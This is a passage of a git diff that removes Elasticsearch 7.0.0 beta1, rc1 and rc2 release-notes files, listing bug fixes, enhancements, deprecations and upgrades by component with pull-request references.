Fix potential IllegalCapacityException in LLRC when selecting nodes {es-pull}37821[#37821] - -Features/Monitoring:: -* Allow built-in monitoring_user role to call GET _xpack API {es-pull}38060[#38060] (issue: {es-issue}37970[#37970]) - -Features/Watcher:: -* Support merge nested Map in list for JIRA configurations {es-pull}37634[#37634] (issue: {es-issue}30068[#30068]) -* Watcher accounts constructed lazily {es-pull}36656[#36656] -* Ensures watch definitions are valid json {es-pull}30692[#30692] (issue: {es-issue}29746[#29746]) - -Geo:: -* Fix GeoHash PrefixTree BWC {es-pull}38584[#38584] (issue: {es-issue}38494[#38494]) -* Geo: Do not normalize the longitude with value -180 for Lucene shapes {es-pull}37299[#37299] (issue: {es-issue}37297[#37297]) - -Infra/Core:: -* Bubble-up exceptions from scheduler {es-pull}38317[#38317] (issue: {es-issue}38014[#38014]) -* Core: Revert back to joda's multi date formatters {es-pull}36814[#36814] (issues: {es-issue}36447[#36447], {es-issue}36602[#36602]) -* Propagate Errors in executors to uncaught exception handler {es-pull}36137[#36137] (issue: {es-issue}28667[#28667]) - -Infra/Packaging:: -* Remove NOREPLACE for /etc/elasticsearch in rpm and deb {es-pull}37839[#37839] -* Packaging: Update marker used to allow ELASTIC_PASSWORD {es-pull}37243[#37243] (issue: {es-issue}37240[#37240]) -* Packaging: Remove permission editing in postinst {es-pull}37242[#37242] (issue: {es-issue}37143[#37143]) - -Infra/REST API:: -* Reject all requests that have an unconsumed body {es-pull}37504[#37504] (issues: {es-issue}30792[#30792], {es-issue}37501[#37501], {es-issue}8217[#8217]) - -Infra/Scripting:: -* Fix Painless void return bug {es-pull}38046[#38046] - -Infra/Settings:: -* Fix setting by time unit {es-pull}37192[#37192] -* Fix handling of fractional byte size value settings {es-pull}37172[#37172] -* Fix handling of fractional time value settings {es-pull}37171[#37171] - -Machine Learning:: -* [ML] Report index unavailable instead of waiting for lazy node {es-pull}38423[#38423] -* ML: Fix error race condition on stop _all datafeeds and close _all jobs {es-pull}38113[#38113] (issue: {es-issue}37959[#37959]) -* [ML] Update ML results mappings on process start {es-pull}37706[#37706] (issue: {es-issue}37607[#37607]) -* [ML] Prevent submit after autodetect worker is stopped {es-pull}37700[#37700] (issue: {es-issue}37108[#37108]) -* [ML] Fix ML datafeed CCS with wildcarded cluster name {es-pull}37470[#37470] (issue: {es-issue}36228[#36228]) -* [ML] Update error message for process update {es-pull}37363[#37363] -* [ML] Wait for autodetect to be ready in the datafeed {es-pull}37349[#37349] (issues: {es-issue}36810[#36810], {es-issue}37227[#37227]) -* [ML] Stop datafeeds running when their jobs are stale {es-pull}37227[#37227] (issue: {es-issue}36810[#36810]) -* [ML] Order GET job stats response by job id {es-pull}36841[#36841] (issue: {es-issue}36683[#36683]) -* [ML] Make GetJobStats work with arbitrary wildcards and groups {es-pull}36683[#36683] (issue: {es-issue}34745[#34745]) - -Mapping:: -* Treat put-mapping calls with `_doc` as a top-level key as typed calls. {es-pull}38032[#38032] -* Correct deprec log in RestGetFieldMappingAction {es-pull}37843[#37843] (issue: {es-issue}37667[#37667]) -* Restore a noop _all metadata field for 6x indices {es-pull}37808[#37808] (issue: {es-issue}37429[#37429]) -* Make sure PutMappingRequest accepts content types other than JSON. {es-pull}37720[#37720] -* Make sure to use the resolved type in DocumentMapperService#extractMappings. {es-pull}37451[#37451] (issue: {es-issue}36811[#36811]) -* MAPPING: Improve Precision for scaled_float {es-pull}37169[#37169] (issue: {es-issue}32570[#32570]) -* Make sure to accept empty unnested mappings in create index requests. {es-pull}37089[#37089] -* Stop automatically nesting mappings in index creation requests. {es-pull}36924[#36924] -* Rewrite SourceToParse with resolved docType {es-pull}36921[#36921] (issues: {es-issue}35790[#35790], {es-issue}36769[#36769]) - -Network:: -* Reload SSL context on file change for LDAP {es-pull}36937[#36937] (issues: {es-issue}30509[#30509], {es-issue}36923[#36923]) -* Do not resolve addresses in remote connection info {es-pull}36671[#36671] (issue: {es-issue}35658[#35658]) - -Ranking:: -* QueryRescorer should keep the window size when rewriting {es-pull}36836[#36836] - -Recovery:: -* RecoveryMonitor#lastSeenAccessTime should be volatile {es-pull}36781[#36781] - -Rollup:: -* Fix Rollup's metadata parser {es-pull}36791[#36791] (issue: {es-issue}36726[#36726]) -* Fix rollup search statistics {es-pull}36674[#36674] - -SQL:: -* SQL: Prevent grouping over grouping functions {es-pull}38649[#38649] (issue: {es-issue}38308[#38308]) -* SQL: Relax StackOverflow circuit breaker for constants {es-pull}38572[#38572] (issue: {es-issue}38571[#38571]) -* SQL: Fix issue with IN not resolving to underlying keyword field {es-pull}38440[#38440] (issue: {es-issue}38424[#38424]) -* SQL: change the Intervals milliseconds precision to 3 digits {es-pull}38297[#38297] (issue: {es-issue}37423[#37423]) -* SQL: Fix esType for DATETIME/DATE and INTERVALS {es-pull}38179[#38179] (issue: {es-issue}38051[#38051]) -* SQL: Added SSL configuration options tests {es-pull}37875[#37875] (issue: {es-issue}37711[#37711]) -* SQL: Fix casting from date to numeric type to use millis {es-pull}37869[#37869] (issue: {es-issue}37655[#37655]) -* SQL: Fix BasicFormatter NPE {es-pull}37804[#37804] -* SQL: Return Intervals in SQL format for CLI {es-pull}37602[#37602] (issues: {es-issue}29970[#29970], {es-issue}36186[#36186], {es-issue}36432[#36432]) -* SQL: fix object extraction from sources {es-pull}37502[#37502] (issue: {es-issue}37364[#37364]) -* SQL: Fix issue with field names containing "." {es-pull}37364[#37364] (issue: {es-issue}37128[#37128]) -* SQL: Fix bug regarding alias fields with dots {es-pull}37279[#37279] (issue: {es-issue}37224[#37224]) -* SQL: Proper handling of COUNT(field_name) and COUNT(DISTINCT field_name) {es-pull}37254[#37254] (issue: {es-issue}30285[#30285]) -* SQL: fix COUNT DISTINCT filtering {es-pull}37176[#37176] (issue: {es-issue}37086[#37086]) -* SQL: Fix issue with wrong NULL optimization {es-pull}37124[#37124] (issue: {es-issue}35872[#35872]) -* SQL: Fix issue with complex expression as args of PERCENTILE/_RANK {es-pull}37102[#37102] (issue: {es-issue}37099[#37099]) -* SQL: Handle the bwc Joda ZonedDateTime scripting class in Painless {es-pull}37024[#37024] (issue: {es-issue}37023[#37023]) -* SQL: Fix bug regarding histograms usage in scripting {es-pull}36866[#36866] -* SQL: Fix issue with always false filter involving functions {es-pull}36830[#36830] (issue: {es-issue}35980[#35980]) -* SQL: protocol returns ISO 8601 String formatted dates instead of Long for JDBC/ODBC requests {es-pull}36800[#36800] (issue: {es-issue}36756[#36756]) -* SQL: Enhance Verifier to prevent aggregate or grouping functions from {es-pull}36799[#36799] (issue: {es-issue}36798[#36798]) -* SQL: Fix translation of LIKE/RLIKE keywords {es-pull}36672[#36672] (issues: {es-issue}36039[#36039], {es-issue}36584[#36584]) -* SQL: Scripting support for casting functions CAST and CONVERT {es-pull}36640[#36640] (issue: {es-issue}36061[#36061]) -* SQL: Concat should be always not nullable {es-pull}36601[#36601] (issue: {es-issue}36169[#36169]) -* SQL: Fix issue with complex HAVING and GROUP BY ordinal {es-pull}36594[#36594] (issue: {es-issue}36059[#36059]) - -Search:: -* Look up connection using the right cluster alias when releasing contexts {es-pull}38570[#38570] -* Fix fetch source option in expand search phase {es-pull}37908[#37908] (issue: {es-issue}23829[#23829]) -* Change `rational` to `saturation` in script_score {es-pull}37766[#37766] (issue: {es-issue}37714[#37714]) -* Throw if two inner_hits have the same name {es-pull}37645[#37645] (issue: {es-issue}37584[#37584]) -* Ensure either success or failure path for SearchOperationListener is called {es-pull}37467[#37467] (issue: {es-issue}37185[#37185]) -* `query_string` should use indexed prefixes {es-pull}36895[#36895] -* Avoid duplicate types deprecation messages in search-related APIs. {es-pull}36802[#36802] - -Security:: -* Fix exit code for Security CLI tools {es-pull}37956[#37956] (issue: {es-issue}37841[#37841]) -* Fix potential NPE in UsersTool {es-pull}37660[#37660] - -Snapshot/Restore:: -* Fix Concurrent Snapshot Ending And Stabilize Snapshot Finalization {es-pull}38368[#38368] (issue: {es-issue}38226[#38226]) -* Fix Two Races that Lead to Stuck Snapshots {es-pull}37686[#37686] (issues: {es-issue}32265[#32265], {es-issue}32348[#32348]) -* Fix Race in Concurrent Snapshot Delete and Create {es-pull}37612[#37612] (issue: {es-issue}37581[#37581]) -* Streamline S3 Repository- and Client-Settings {es-pull}37393[#37393] - -Suggesters:: -* Fix duplicate removal when merging completion suggestions {es-pull}36996[#36996] (issue: {es-issue}35836[#35836]) - -Task Management:: -* Un-assign persistent tasks as nodes exit the cluster {es-pull}37656[#37656] - -ZenDiscovery:: -* Fix size of rolling-upgrade bootstrap config {es-pull}38031[#38031] -* Always return metadata version if metadata is requested {es-pull}37674[#37674] -* [Zen2] Elect freshest master in upgrade {es-pull}37122[#37122] (issue: {es-issue}40[#40]) -* Fix cluster state persistence for single-node discovery {es-pull}36825[#36825] - - - -[[regression-7.0.0-beta1]] -[discrete] -=== Regressions - -Infra/Core:: -* Restore date aggregation performance in UTC case {es-pull}38221[#38221] (issue: {es-issue}37826[#37826]) -* Speed up converting of temporal accessor to zoned date time {es-pull}37915[#37915] (issue: {es-issue}37826[#37826]) - -Mapping:: -* Performance fix. Reduce deprecation calls for the same bulk request {es-pull}37415[#37415] (issue: {es-issue}37411[#37411]) - - - -[[upgrade-7.0.0-beta1]] -[discrete] -=== Upgrades - -Engine:: -* Upgrade to lucene-8.0.0-snapshot-83f9835. {es-pull}37668[#37668] - -Machine Learning:: -* [ML] No need to add state doc mapping on job open in 7.x {es-pull}37759[#37759] - - - diff --git a/docs/reference/release-notes/7.0.0-rc1.asciidoc b/docs/reference/release-notes/7.0.0-rc1.asciidoc deleted file mode 100644 index 80b5190db4a..00000000000 --- a/docs/reference/release-notes/7.0.0-rc1.asciidoc +++ /dev/null @@ -1,193 +0,0 @@ -[[release-notes-7.0.0-rc1]] -== {es} version 7.0.0-rc1 - -Also see <>. - -[[breaking-7.0.0-rc1]] -[discrete] -=== Breaking changes - -Distributed:: -* Remove cluster state size {es-pull}40061[#40061] (issues: {es-issue}39806[#39806], {es-issue}39827[#39827], {es-issue}39951[#39951], {es-issue}40016[#40016]) - -Features/Features:: -* Remove Migration Upgrade and Assistance APIs {es-pull}40075[#40075] (issue: {es-issue}40014[#40014]) - - - -[[deprecation-7.0.0-rc1]] -[discrete] -=== Deprecations - -Cluster Coordination:: -* Deprecate size in cluster state response {es-pull}39951[#39951] (issue: {es-issue}39806[#39806]) - -Infra/Packaging:: -* Deprecate fallback to java on PATH {es-pull}37990[#37990] - - - -[[feature-7.0.0-rc1]] -[discrete] -=== New features - -Allocation:: -* Node repurpose tool {es-pull}39403[#39403] (issues: {es-issue}37347[#37347], {es-issue}37748[#37748]) - -Security:: -* Switch internal security index to ".security-7" {es-pull}39337[#39337] (issue: {es-issue}39284[#39284]) - - - -[[enhancement-7.0.0-rc1]] -[discrete] -=== Enhancements - -CCR:: -* Reduce retention lease sync intervals {es-pull}40302[#40302] -* Renew retention leases while following {es-pull}39335[#39335] (issues: {es-issue}37165[#37165], {es-issue}38718[#38718]) -* Reduce refresh when lookup term in FollowingEngine {es-pull}39184[#39184] -* Integrate retention leases to recovery from remote {es-pull}38829[#38829] (issue: {es-issue}37165[#37165]) -* Enable removal of retention leases {es-pull}38751[#38751] (issue: {es-issue}37165[#37165]) - -Client:: -* Fixed required fields and paths list {es-pull}39358[#39358] - -Discovery-Plugins:: -* Adds connect and read timeouts to discovery-gce {es-pull}28193[#28193] (issue: {es-issue}24313[#24313]) - -Distributed:: -* Introduce retention lease actions {es-pull}38756[#38756] (issue: {es-issue}37165[#37165]) -* Add dedicated retention lease exceptions {es-pull}38754[#38754] (issue: {es-issue}37165[#37165]) -* Copy retention leases when trim unsafe commits {es-pull}37995[#37995] (issue: {es-issue}37165[#37165]) - -Docs Infrastructure:: -* Align generated release notes with doc standards {es-pull}39234[#39234] (issue: {es-issue}39155[#39155]) - -Engine:: -* Explicitly advance max_seq_no before indexing {es-pull}39473[#39473] (issue: {es-issue}38879[#38879]) - -Infra/Core:: -* Add details about what acquired the shard lock last {es-pull}38807[#38807] (issue: {es-issue}30290[#30290]) - -Infra/Packaging:: -* Use bundled JDK in Docker images {es-pull}40238[#40238] -* Upgrade bundled JDK and Docker images to JDK 12 {es-pull}40229[#40229] -* Bundle java in distributions {es-pull}38013[#38013] (issue: {es-issue}31845[#31845]) - -Infra/Settings:: -* Provide a clearer error message on keystore add {es-pull}39327[#39327] (issue: {es-issue}39324[#39324]) - -Percolator:: -* Make the `type` parameter optional when percolating existing documents. {es-pull}39987[#39987] (issue: {es-issue}39963[#39963]) -* Add support for selecting percolator query candidate matches containing geo_point based queries {es-pull}26040[#26040] - -SQL:: -* Enhance checks for inexact fields {es-pull}39427[#39427] (issue: {es-issue}38501[#38501]) -* Change the default precision for CURRENT_TIMESTAMP function {es-pull}39391[#39391] (issue: {es-issue}39288[#39288]) - - - -[[bug-7.0.0-rc1]] -[discrete] -=== Bug fixes - -Aggregations:: -* Skip sibling pipeline aggregators reduction during non-final reduce {es-pull}40101[#40101] (issue: {es-issue}40059[#40059]) -* Extend nextDoc to delegate to the wrapped doc-value iterator for date_nanos {es-pull}39176[#39176] (issue: {es-issue}39107[#39107]) -* Only create MatrixStatsResults on final reduction {es-pull}38130[#38130] (issue: {es-issue}37587[#37587]) - -Authentication:: -* Allow non super users to create API keys {es-pull}40028[#40028] (issue: {es-issue}40029[#40029]) -* Use consistent view of realms for authentication {es-pull}38815[#38815] (issue: {es-issue}30301[#30301]) - -CCR:: -* Safe publication of AutoFollowCoordinator {es-pull}40153[#40153] (issue: {es-issue}38560[#38560]) -* Enable reading auto-follow patterns from x-content {es-pull}40130[#40130] (issue: {es-issue}40128[#40128]) -* Stop auto-followers on shutdown {es-pull}40124[#40124] -* Protect against the leader index being removed {es-pull}39351[#39351] (issue: {es-issue}39308[#39308]) -* Handle the fact that `ShardStats` instance may have no commit or seqno stats {es-pull}38782[#38782] (issue: {es-issue}38779[#38779]) -* Fix LocalIndexFollowingIT#testRemoveRemoteConnection() test {es-pull}38709[#38709] (issue: {es-issue}38695[#38695]) - -CRUD:: -* Cascading primary failure lead to MSU too low {es-pull}40249[#40249] - -Cluster Coordination:: -* Fix node tool cleanup {es-pull}39389[#39389] -* Avoid serialising state if it was already serialised {es-pull}39179[#39179] - -Distributed:: -* Ignore waitForActiveShards when syncing leases {es-pull}39224[#39224] (issue: {es-issue}39089[#39089]) -* Fix synchronization in LocalCheckpointTracker#contains {es-pull}38755[#38755] (issues: {es-issue}33871[#33871], {es-issue}38633[#38633]) - -Engine:: -* Bubble up exception when processing NoOp {es-pull}39338[#39338] (issue: {es-issue}38898[#38898]) -* ReadOnlyEngine should update translog recovery state information {es-pull}39238[#39238] - -Features/Features:: -* Only count some fields types for deprecation check {es-pull}40166[#40166] - -Features/ILM:: -* Handle failure to release retention leases in ILM {es-pull}39281[#39281] (issue: {es-issue}39181[#39181]) - -Features/Watcher:: -* Use non-ILM template setting up watch history template & ILM disabled {es-pull}39325[#39325] (issue: {es-issue}38805[#38805]) -* Only flush Watcher's bulk processor if Watcher is enabled {es-pull}38803[#38803] (issue: {es-issue}38798[#38798]) - -Infra/Core:: -* Correct name of basic_date_time_no_millis {es-pull}39367[#39367] - -Infra/Packaging:: -* Some elasticsearch-cli tools could not be run not from ES_HOME {es-pull}39937[#39937] -* Obsolete pre 7.0 noarch package in rpm {es-pull}39472[#39472] (issue: {es-issue}39414[#39414]) -* Suppress error message when `/proc/sys/vm/max_map_count` is not exists. {es-pull}35933[#35933] - -Infra/REST API:: -* Fix #38623 remove xpack namespace REST API {es-pull}38625[#38625] -* Remove the "xpack" namespace from the REST API {es-pull}38623[#38623] - -Recovery:: -* Create retention leases file during recovery {es-pull}39359[#39359] (issue: {es-issue}37165[#37165]) - -SQL:: -* Add missing handling of IP field in JDBC {es-pull}40384[#40384] (issue: {es-issue}40358[#40358]) -* Fix metric aggs on date/time to not return double {es-pull}40377[#40377] (issues: {es-issue}39492[#39492], {es-issue}40376[#40376]) -* CAST supports both SQL and ES types {es-pull}40365[#40365] (issue: {es-issue}40282[#40282]) -* Fix RLIKE bug and improve testing for RLIKE statement {es-pull}40354[#40354] (issues: {es-issue}34609[#34609], {es-issue}39931[#39931]) -* Unwrap the first value in an array in case of array leniency {es-pull}40318[#40318] (issue: {es-issue}40296[#40296]) -* Preserve original source for cast/convert function {es-pull}40271[#40271] (issue: {es-issue}40239[#40239]) -* Fix LIKE function equality by considering its pattern as well {es-pull}40260[#40260] (issue: {es-issue}39931[#39931]) -* Fix issue with optimization on queries with ORDER BY/LIMIT {es-pull}40256[#40256] (issue: {es-issue}40211[#40211]) -* Rewrite ROUND and TRUNCATE functions with a different optional parameter handling method {es-pull}40242[#40242] (issue: {es-issue}40001[#40001]) -* Fix issue with getting DATE type in JDBC {es-pull}40207[#40207] -* Fix issue with date columns returned always in UTC {es-pull}40163[#40163] (issue: {es-issue}40152[#40152]) -* Add multi_value_field_leniency inside FieldHitExtractor {es-pull}40113[#40113] (issue: {es-issue}39700[#39700]) -* Fix incorrect ordering of groupings (GROUP BY) based on orderings (ORDER BY) {es-pull}40087[#40087] (issue: {es-issue}39956[#39956]) -* Fix bug with JDBC timezone setting and DATE type {es-pull}39978[#39978] (issue: {es-issue}39915[#39915]) -* Use underlying exact field for LIKE/RLIKE {es-pull}39443[#39443] (issue: {es-issue}39442[#39442]) - -Search:: -* Serialize top-level pipeline aggs as part of InternalAggregations {es-pull}40177[#40177] (issues: {es-issue}40059[#40059], {es-issue}40101[#40101]) -* CCS: Skip empty search hits when minimizing round-trips {es-pull}40098[#40098] (issues: {es-issue}32125[#32125], {es-issue}40067[#40067]) -* CCS: Disable minimizing round-trips when dfs is requested {es-pull}40044[#40044] (issue: {es-issue}32125[#32125]) - - - -[[upgrade-7.0.0-rc1]] -[discrete] -=== Upgrades - -Discovery-Plugins:: -* Bump jackson-databind version for AWS SDK {es-pull}39183[#39183] - -Engine:: -* Upgrade to Lucene 8.0.0-snapshot-ff9509a8df {es-pull}39350[#39350] -* Upgrade to Lucene 8.0.0 {es-pull}39992[#39992] (issue: {es-issue}39640[#39640]) - -Features/Ingest:: -* Bump jackson-databind version for ingest-geoip {es-pull}39182[#39182] - -Security:: -* Upgrade the bouncycastle dependency to 1.61 {es-pull}40017[#40017] (issue: {es-issue}40011[#40011]) - - diff --git a/docs/reference/release-notes/7.0.0-rc2.asciidoc b/docs/reference/release-notes/7.0.0-rc2.asciidoc deleted file mode 100644 index 4397d457b9e..00000000000 --- a/docs/reference/release-notes/7.0.0-rc2.asciidoc +++ /dev/null @@ -1,218 +0,0 @@ -[[release-notes-7.0.0-rc2]] -== {es} version 7.0.0-rc2 - -Also see <>. - -[[deprecation-7.0.0-rc2]] -[discrete] -=== Deprecations - -Analysis:: -* Remove `nGram` and `edgeNGram` token filter names (#38911) {es-pull}39070[#39070] (issues: {es-issue}30209[#30209], {es-issue}38911[#38911]) - -Graph:: -* Deprecate types in `_graph/explore` calls. {es-pull}40466[#40466] - - - -[[enhancement-7.0.0-rc2]] -[discrete] -=== Enhancements - -CCR:: -* Introduce forget follower API {es-pull}39718[#39718] (issue: {es-issue}37165[#37165]) - -Cluster Coordination:: -* Remove timeout task after completing cluster state publication {es-pull}40411[#40411] -* Use default discovery implementation for single-node discovery {es-pull}40036[#40036] -* Do not log unsuccessful join attempt each time {es-pull}39756[#39756] - -Distributed:: -* Allow retention lease operations under blocks {es-pull}39089[#39089] (issues: {es-issue}34648[#34648], {es-issue}37165[#37165]) -* Remove retention leases when unfollowing {es-pull}39088[#39088] (issues: {es-issue}34648[#34648], {es-issue}37165[#37165]) -* Introduce retention lease state file {es-pull}39004[#39004] (issues: {es-issue}37165[#37165], {es-issue}38588[#38588], {es-issue}39032[#39032]) -* Enable soft-deletes by default for 7.0+ indices {es-pull}38929[#38929] (issue: {es-issue}36141[#36141]) - -Engine:: -* Also mmap cfs files for hybridfs {es-pull}38940[#38940] (issue: {es-issue}36668[#36668]) - -Infra/Core:: -* Enhancements to IndicesQueryCache. {es-pull}39099[#39099] (issue: {es-issue}37117[#37117]) - -Infra/Packaging:: -* Add no-jdk distributions {es-pull}39882[#39882] - -Machine Learning:: -* [ML] Allow stop unassigned datafeed and relax unset upgrade mode wait {es-pull}39034[#39034] - -Mapping:: -* Introduce a parameter suppress_types_warnings. {es-pull}38923[#38923] - -Recovery:: -* Do not wait for advancement of checkpoint in recovery {es-pull}39006[#39006] (issues: {es-issue}38949[#38949], {es-issue}39000[#39000]) - -SQL:: -* SQL: add "fuzziness" option to QUERY and MATCH function predicates {es-pull}40529[#40529] (issue: {es-issue}40495[#40495]) -* SQL: add "validate.properties" property to JDBC's allowed list of settings {es-pull}39050[#39050] (issue: {es-issue}38068[#38068]) - -Search:: -* Avoid BytesRef's copying in ScriptDocValues's Strings {es-pull}29581[#29581] (issue: {es-issue}29567[#29567]) - -Security:: -* Types removal security index template {es-pull}39705[#39705] (issue: {es-issue}38637[#38637]) -* Types removal security index template {es-pull}39542[#39542] (issue: {es-issue}38637[#38637]) - -Snapshot/Restore:: -* Mark Deleted Snapshot Directories with Tombstones {es-pull}40228[#40228] (issue: {es-issue}39852[#39852]) - -Store:: -* Add option to force load term dict into memory {es-pull}39741[#39741] - -Features/Monitoring:: -* Remove types from internal monitoring templates and bump to api 7 {es-pull}39888[#39888] (issue: {es-issue}38637[#38637]) - -Features/Watcher:: -* Remove the index type from internal watcher indexes {es-pull}39761[#39761] (issue: {es-issue}38637[#38637]) - -Infra/Core:: -* Change zone formatting for all printers {es-pull}39568[#39568] (issue: {es-issue}38471[#38471]) - - -[[bug-7.0.0-rc2]] -[discrete] -=== Bug fixes - -Analysis:: -* Fix PreConfiguredTokenFilters getSynonymFilter() implementations {es-pull}38839[#38839] (issue: {es-issue}38793[#38793]) - -Audit:: -* LoggingAuditTrail correctly handle ReplicatedWriteRequest {es-pull}39925[#39925] (issue: {es-issue}39555[#39555]) - -Authentication:: -* Correct authenticate response for API key {es-pull}39684[#39684] -* Fix security index auto-create and state recovery race {es-pull}39582[#39582] - -CCR:: -* Fix shard follow task startup error handling {es-pull}39053[#39053] (issue: {es-issue}38779[#38779]) -* Filter out upgraded version index settings when starting index following {es-pull}38838[#38838] (issue: {es-issue}38835[#38835]) - -CRUD:: -* Store Pending Deletions Fix {es-pull}40345[#40345] (issue: {es-issue}40249[#40249]) -* ShardBulkAction ignore primary response on primary {es-pull}38901[#38901] - -Cluster Coordination:: -* Do not perform cleanup if Manifest write fails with dirty exception {es-pull}40519[#40519] (issue: {es-issue}39077[#39077]) -* Cache compressed cluster state size {es-pull}39827[#39827] (issue: {es-issue}39806[#39806]) -* Drop node if asymmetrically partitioned from master {es-pull}39598[#39598] -* Fixing the custom object serialization bug in diffable utils. {es-pull}39544[#39544] -* Clean GatewayAllocator when stepping down as master {es-pull}38885[#38885] - -Distributed:: -* Enforce retention leases require soft deletes {es-pull}39922[#39922] (issue: {es-issue}39914[#39914]) -* Treat TransportService stopped error as node is closing {es-pull}39800[#39800] (issue: {es-issue}39584[#39584]) -* Use cause to determine if node with primary is closing {es-pull}39723[#39723] (issue: {es-issue}39584[#39584]) -* Don’t ack if unable to remove failing replica {es-pull}39584[#39584] (issue: {es-issue}39467[#39467]) -* Fix NPE on Stale Index in IndicesService {es-pull}38891[#38891] (issue: {es-issue}38845[#38845]) - -Engine:: -* Advance max_seq_no before add operation to Lucene {es-pull}38879[#38879] (issue: {es-issue}31629[#31629]) - -Features/Features:: -* Deprecation check for indices with very large numbers of fields {es-pull}39869[#39869] (issue: {es-issue}39851[#39851]) - -Features/ILM:: -* Correct ILM metadata minimum compatibility version {es-pull}40569[#40569] (issue: {es-issue}40565[#40565]) -* Handle null retention leases in WaitForNoFollowersStep {es-pull}40477[#40477] - -Features/Ingest:: -* Ingest ingest then create index {es-pull}39607[#39607] (issues: {es-issue}32758[#32758], {es-issue}32786[#32786], {es-issue}36545[#36545]) - -Features/Monitoring:: -* Don't emit deprecation warnings on calls to the monitoring bulk API. {es-pull}39805[#39805] (issue: {es-issue}39336[#39336]) - -Features/Watcher:: -* Fix Watcher stats class cast exception {es-pull}39821[#39821] (issue: {es-issue}39780[#39780]) -* Use any index specified by .watches for Watcher {es-pull}39541[#39541] (issue: {es-issue}39478[#39478]) -* Resolve concurrency with watcher trigger service {es-pull}39092[#39092] (issue: {es-issue}39087[#39087]) - -Geo:: -* Geo Point parse error fix {es-pull}40447[#40447] (issue: {es-issue}17617[#17617]) - -Highlighting:: -* Bug fix for AnnotatedTextHighlighter - port of 39525 {es-pull}39750[#39750] (issue: {es-issue}39525[#39525]) - -Infra/Core:: -* Allow single digit milliseconds in strict date parsing {es-pull}40676[#40676] (issue: {es-issue}40403[#40403]) -* Parse composite patterns using ClassicFormat.parseObject {es-pull}40100[#40100] (issue: {es-issue}39916[#39916]) -* Bat scripts to work with JAVA_HOME with parantheses {es-pull}39712[#39712] (issues: {es-issue}30606[#30606], {es-issue}33405[#33405], {es-issue}38578[#38578], {es-issue}38624[#38624]) -* Change licence expiration date pattern {es-pull}39681[#39681] (issue: {es-issue}39136[#39136]) -* Fix DateFormatters.parseMillis when no timezone is given {es-pull}39100[#39100] (issue: {es-issue}39067[#39067]) -* Don't close caches while there might still be in-flight requests. {es-pull}38958[#38958] (issue: {es-issue}37117[#37117]) - -Infra/Packaging:: -* Use TAR instead of DOCKER build type before 6.7.0 {es-pull}40723[#40723] (issues: {es-issue}39378[#39378], {es-issue}40511[#40511]) - -Infra/REST API:: -* Update spec files that erroneously documented parts as optional {es-pull}39122[#39122] -* ilm.explain_lifecycle documents human again {es-pull}39113[#39113] -* Index on rollup.rollup_search.json is a list {es-pull}39097[#39097] - -MULTIPLE AREA LABELS:: -* metric on watcher stats is a list not an enum {es-pull}39114[#39114] - -Machine Learning:: -* [ML] Fix datafeed skipping first bucket after lookback when aggs are … {es-pull}39859[#39859] (issue: {es-issue}39842[#39842]) -* [ML] refactoring lazy query and agg parsing {es-pull}39776[#39776] (issue: {es-issue}39528[#39528]) -* [ML] Stop the ML memory tracker before closing node {es-pull}39111[#39111] (issue: {es-issue}37117[#37117]) - -Mapping:: -* Optimise rejection of out-of-range `long` values {es-pull}40325[#40325] (issues: {es-issue}26137[#26137], {es-issue}40323[#40323]) - -Recovery:: -* Recover peers from translog, ignoring soft deletes {es-pull}38904[#38904] (issue: {es-issue}37165[#37165]) -* Retain history for peer recovery using leases {es-pull}38855[#38855] - -Rollup:: -* Remove timezone validation on rollup range queries {es-pull}40647[#40647] - -SQL:: -* SQL: Fix display size for DATE/DATETIME {es-pull}40669[#40669] -* SQL: have LIKE/RLIKE use wildcard and regexp queries {es-pull}40628[#40628] (issue: {es-issue}40557[#40557]) -* SQL: Fix getTime() methods in JDBC {es-pull}40484[#40484] -* SQL: SYS TABLES: enumerate tables of requested types {es-pull}40535[#40535] (issue: {es-issue}40348[#40348]) -* SQL: passing an input to the CLI "freezes" the CLI after displaying an error message {es-pull}40164[#40164] (issue: {es-issue}40557[#40557]) -* SQL: Wrap ZonedDateTime parameters inside scripts {es-pull}39911[#39911] (issue: {es-issue}39877[#39877]) -* SQL: ConstantProcessor can now handle NamedWriteable {es-pull}39876[#39876] (issue: {es-issue}39875[#39875]) -* SQL: Extend the multi dot field notation extraction to lists of values {es-pull}39823[#39823] (issue: {es-issue}39738[#39738]) -* SQL: values in datetime script aggs should be treated as long {es-pull}39773[#39773] (issue: {es-issue}37042[#37042]) -* SQL: Don't allow inexact fields for MIN/MAX {es-pull}39563[#39563] (issue: {es-issue}39427[#39427]) -* SQL: Fix merging of incompatible multi-fields {es-pull}39560[#39560] (issue: {es-issue}39547[#39547]) -* SQL: fix COUNT DISTINCT column name {es-pull}39537[#39537] (issue: {es-issue}39511[#39511]) -* SQL: Enable accurate hit tracking on demand {es-pull}39527[#39527] (issue: {es-issue}37971[#37971]) -* SQL: ignore UNSUPPORTED fields for JDBC and ODBC modes in 'SYS COLUMNS' {es-pull}39518[#39518] (issue: {es-issue}39471[#39471]) -* SQL: enforce JDBC driver - ES server version parity {es-pull}38972[#38972] (issue: {es-issue}38775[#38775]) -* SQL: fall back to using the field name for column label {es-pull}38842[#38842] (issue: {es-issue}38831[#38831]) - -Search:: -* Fix Fuzziness#asDistance(String) {es-pull}39643[#39643] (issue: {es-issue}39614[#39614]) - -Security:: -* Remove dynamic objects from security index {es-pull}40499[#40499] (issue: {es-issue}35460[#35460]) -* Fix libs:ssl-config project setup {es-pull}39074[#39074] -* Do not create the missing index when invoking getRole {es-pull}39039[#39039] - -Snapshot/Restore:: -* Blob store compression fix {es-pull}39073[#39073] - - - -[[upgrade-7.0.0-rc2]] -[discrete] -=== Upgrades - -Snapshot/Restore:: -* plugins/repository-gcs: Update google-cloud-storage/core to 1.59.0 {es-pull}39748[#39748] (issue: {es-issue}39366[#39366]) - -Search:: -* Upgrade to Lucene 8.0.0 GA {es-pull}39992[#39992] (issue: {es-issue}39640[#39640]) - diff --git a/docs/reference/release-notes/7.0.asciidoc b/docs/reference/release-notes/7.0.asciidoc deleted file mode 100644 index f457b9652ff..00000000000 --- a/docs/reference/release-notes/7.0.asciidoc +++ /dev/null @@ -1,1658 +0,0 @@ -[[release-notes-7.0.0]] -== {es} version 7.0.0 - -These release notes include all changes made in the alpha, beta, and RC -releases of 7.0.0. - -Also see <>. - -[discrete] -=== Known issues - -* Applying deletes or updates on an index after it has been shrunk may corrupt -the index. In order to prevent this issue, it is recommended to stop shrinking -read-write indices. For read-only indices, it is recommended to force-merge -indices after shrinking, which significantly reduces the likeliness of this -corruption in the case that deletes/updates would be applied by mistake. This -bug is fixed in {es} 7.7 and later versions. More details can be found on the -https://issues.apache.org/jira/browse/LUCENE-9300[corresponding issue]. - -* Indices 